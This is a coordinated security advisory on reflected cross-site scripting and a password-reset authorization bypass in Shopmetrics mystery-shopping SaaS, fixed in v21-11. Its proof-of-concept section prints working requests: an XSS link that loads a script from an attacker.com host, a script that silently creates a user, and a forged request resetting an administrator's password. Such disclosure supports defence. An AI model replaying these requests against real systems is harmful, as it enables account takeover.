SEC Consult Vulnerability Lab Security Advisory < 20220202-0 >
=======================================================================
title: Broken access control & Cross-Site Scripting
product: Shopmetrics Mystery Shopping Software
vulnerable version: SaaS platform before v21-11
fixed version: SaaS platform v21-11
CVE number: n/a for SaaS
impact: Critical
homepage: https://www.shopmetrics.com/
found: 2021-05-06
by: D. Zalmanov (Office Moscow)
A. Vodyasov (Office Moscow)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Founded in 2004, Shopmetrics is a company that offers technology platform
solutions to mystery shopping and market research providers worldwide. Today
Shopmetrics is a global organization with offices in North America and Europe.
With over 80 full-time, dedicated developers and product specialists we are
committed to providing technology that is the industry benchmark in mystery
shopping and market research."
Source: https://shopmetrics.com/Company.asp
Business recommendation:
------------------------
The solution is provided as software as a service. The current version as of v21-11
already contains the fix and all users should be protected.
An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Reflected cross site scripting
A reflected cross site scripting vulnerability was identified on
various input fields in the application. An attacker is able to perform actions
in the context of the attacked user by exploiting this vulnerability.
2) Broken Access Control
Users of the web application are required to supply a username and password
combination in order to login. This identification mechanism is used in order
to ensure that only those who possess the proper credentials are able to login
to the application, while unauthorized users cannot.
A user who has forgotten or misplaced their password is able to request that
their password be reset by supplying a valid email address.
Therefore, it is of the utmost importance to ensure that unauthorized users –
whether accidentally or intentionally – will not be able to step outside the scope
of their permission boundaries. This means, inter alia, that the tier’s logic may
not be manipulated by the client-side input and that the logic is confined to
parameters defined solely by the server.
It was identified that due to flaws in the authorization scheme, an authorization
bypass vulnerability allows an attacker to get access to the restricted
password reset functionality, which allows an attacker with knowledge of a valid
email address, to reset any password and hijack a user account.
Proof of concept:
-----------------
1) Reflected cross site scripting
The request to create a new user looks like the following:
-------------------------------------------------------------------------------
POST /document.asp?alias=mystadministration.user.manage HTTP/2
[...]
CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&
firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&city=xyz&
state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&phonework=2132132121321&
phonemobile=32132121321&fax=213321321321&email=user%40victim.com&timezone=27&defaultWelcomePage=&isdisabled=N
-------------------------------------------------------------------------------
In a live attack scenario the following JavaScript code will be hosted on the
attacker's server.
-------------------------------------------------------------------------------
var data="CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&
firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&
city=xyz&state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&
phonework=2132132121321&phonemobile=32132121321&fax=213321321321&email=user%40victim.com&
timezone=27&defaultWelcomePage=&isdisabled=N";
var url="https://shopmetricshost/document.asp?alias=mystadministration.user.manage";
var http=new XMLHttpRequest();
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.send(data)
-------------------------------------------------------------------------------
When the logged-in victim clicks on the following link, the script will be executed
in the context of the browser and the new user will be created.
-------------------------------------------------------------------------------
https://shopmetricshost/open/data.asp?post={%22action%22:%22exec%22,%22dataset%22:
{%22datasetname%22:%22/System/Platform/Globalization/LiteralsGetTranslations%22,%22dataformat%22:%22simple%22,%22datafieldproperties%22:{%22columns%22:[%22name%22]}},
%22parameters%22:[{%22name%22:%22LiteralIDs%22,
%22value%22:%22XXX%3C%3E%3Chtml%3E%3Cscript+src%3dhttps%3a//attacker.com%3a4443/payload.js%3E%3C/script%3E%3C/html%3EYYY%22}]}
-------------------------------------------------------------------------------
2) Broken Access Control
There is a password reset functionality in the application. The following request is
sent when the user tries to reset the password.
-------------------------------------------------------------------------------
POST /open/data.asp HTTP/2
[...]
post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",
"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},
"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},
{"name"%3a"EntityName","value"%3a"ChangePassword"},{"name"%3a"EntityInstanceID","value"%3anull},
{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a¬- ¬P¬¬34|
BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬user%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬-
F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬newpass¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬¬newpass¬U¬5983¬-
z¬B¬0-1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}
-------------------------------------------------------------------------------
There is no integrity check of the parameters of this request. Therefore, an attacker
can supply any email to this request and the password of the account, which is connected
to the supplied e-mail, will be changed to the password value controlled by an attacker. For example,
the request to change the password of the admin user with e-mail admin@victim.com (Administrator user).
-------------------------------------------------------------------------------
POST /open/data.asp HTTP/2
[...]
post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",
"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},{"name"%3a"EntityName","value"%3a"ChangePassword"},
{"name"%3a"EntityInstanceID","value"%3anull},{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a15¬¬0¬-
¬ab¬-Mozilla/5.0+(Windows+NT+10.0%3b+Win64%3b+x64%3b+rv%3a88.0)+Gecko/20100101+Firefox/88.0¬¬1¬- ¬P¬¬34|
BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬admin%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬-
F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬AttackerPassword¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬-AttackerPassword¬U¬5983¬-
z¬B¬0¬1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},
{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}
-------------------------------------------------------------------------------
After this request an attacker can successfully login as admin user with the
password "AttackerPassword".
Vulnerable / tested versions:
-----------------------------
No version number is available as the solution is provided as software as a service (SaaS).
The product was affected by the vulnerability during the timeframe of the test and until
it was fixed later in 2021.
Vendor contact timeline:
------------------------
The vendor was contacted through a third party. The vendor confirmed on 7th
December 2021 that the advisory could be published.
Solution:
---------
The solution is provided as software as a service. The current version as of v21-11
contains the fix and all users should be protected.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF D. Zalmanov, A. Vodyasov / @2022